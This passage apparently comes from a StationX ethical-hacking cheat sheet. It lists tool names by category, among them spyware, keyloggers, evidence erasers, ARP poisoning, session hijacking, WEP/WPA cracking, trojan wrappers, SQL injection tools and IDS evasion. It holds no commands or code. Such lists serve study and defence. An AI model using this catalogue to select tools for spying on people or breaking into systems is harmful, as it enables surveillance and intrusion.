  Spyware: Remote Desktop Spy, Activity Monitor, OSMonitor, SSPro, Spector Pro, Actual Spy, Ghost, Hidden Recorder, Desktop Spy, USB Grabber
  Keyloggers and Screen Capture: KeyProwler, Ultimate Keylogger, All in One Keylogger
  Covering Tracks: ELsave, Cleaner, EraserPro, Evidence Eliminator

Sniffing
  Packet Sniffing: Cascade Pilot, Omnipeek, CommView, Capsa
  Packet Capture: Wireshark, CACE, tcpdump, Capsa
  Sniffing: Wireshark, Ace, KerbSniff, Ettercap, OmniPeek, Windump, dnsstuff, EtherApe
  MAC Flooding/Spoofing: Macof, SMAC
  ARP Poisoning: Cain, UfaSoft, WinARP Attacker
  Packet Crafting/Spoofing: Komodia, Hping2, PackEth, Packet Generator, Netscan, Scapy, Nemesis

Session Hijacking
  Paros Proxy, Burp Suite, Firesheep, Hamster/Ferret, Ettercap, Hunt

Wireless
  Discovery: Kismet, NetStumbler, inSSIDer, NetSurveyor
  WEP/WPA Cracking: Aircrack, KisMac, Wireless Security Auditor, WepAttack, WepCrack, coWPatty
  Bluetooth: BTBrowser, BH Bluejack, BTScanner, Bluesnarfer
  Mobile Device Tracking: Wheres My Droid, Find My Phone, GadgetTrack, iHound

Trojans and Malware
  Wrappers: Elite Wrap
  Monitoring Tools: HiJackThis, CurrPorts, Fport
  Attack Tools: Netcat, Nemesis

Web Attacks
  Wfetch, Httprecon, ID Serve, WebSleuth, Black Widow, CookieDigger, Nstalker, NetBrute
  SQL Injection: BSQL Hacker, Marathon, SQL Injection Brute, SQL Brute, SQLNinja, SQLGET

IDS
  Snort
  Evasion Tools: ADMutate, NIDSBench, IDSInformer, Inundator

Cryptography and Encryption
  Encryption: TrueCrypt, BitLocker, DriveCrypt
  Hash Tools: MD5 Hash, Hash Calc
  Steganography: XPTools, ImageHide, Merge Streams, StegParty, gifShuffle, QuickStego, InvisibleSecrets, EZStego, OmniHidePro
  Cryptanalysis: Cryptobench
Find more StationX Cheat Sheets here: https://www.stationx.net/category/cheat-sheets/